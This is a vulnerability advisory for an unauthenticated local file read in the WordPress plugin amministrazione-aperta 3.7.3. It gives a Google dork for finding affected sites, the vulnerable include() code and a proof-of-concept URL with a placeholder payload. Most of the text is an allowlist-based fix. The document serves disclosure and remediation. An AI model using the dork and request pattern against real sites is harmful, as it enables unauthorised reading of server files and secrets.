# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/
# Date: 23-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
# Version: 3.7.3
# Tested on: Firefox
# Vulnerable File: dispatcher.php
# Vulnerable Code:

```php
if ( isset($_GET['open']) ) {
    // $_GET['open'] is appended to the plugin path and handed straight to
    // include() with no normalisation and no allowlist, so the request
    // controls which local file is included and echoed back.
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
    echo '';
    include_once( ABSPATH . WPINC . '/feed.php' );
}
```

# Proof of Concept:
localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]
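A hardened replacement for the `include()` above, added here as an example and not taken from the plugin: the `?open=` value is treated as a key into a fixed allowlist of views, and the resolved path is additionally confined to the plugin directory with `realpath()`. The view names and `AA_PLUGIN_DIR` are assumptions for illustration.

```php
<?php
// Example fix, not the plugin's own code. The request value never reaches
// include() directly; it only selects an entry from a fixed map.
define('AA_PLUGIN_DIR', __DIR__ . '/');   // assumption: plugin root directory

// Allowlist of views that ?open= may load (file names are hypothetical).
const AA_ALLOWED_VIEWS = [
    'dashboard' => 'views/dashboard.php',
    'feed'      => 'views/feed.php',
];

/**
 * Return the absolute path of the allowlisted view named by $open, or null
 * when the key is unknown, the file is missing, or the resolved path falls
 * outside the plugin directory. Unknown keys are denied, not guessed.
 */
function aa_resolve_view(?string $open): ?string {
    if ($open === null || !array_key_exists($open, AA_ALLOWED_VIEWS)) {
        return null;                                   // not on the allowlist
    }
    $base = realpath(AA_PLUGIN_DIR);
    $path = realpath(AA_PLUGIN_DIR . AA_ALLOWED_VIEWS[$open]);
    // realpath() returns false for missing files and collapses ../ so the
    // prefix comparison below is on canonical paths.
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: even an allowlisted entry must resolve inside the
    // plugin directory (guards against a later careless allowlist edit).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$view = aa_resolve_view($_GET['open'] ?? null);
if ($view !== null) {
    include $view;
} else {
    http_response_code(400);
    exit('invalid view');
}
```

Because the lookup is by key rather than by path, traversal sequences, absolute paths and stream wrappers in `open` simply fail the `array_key_exists()` check and are rejected with a 400.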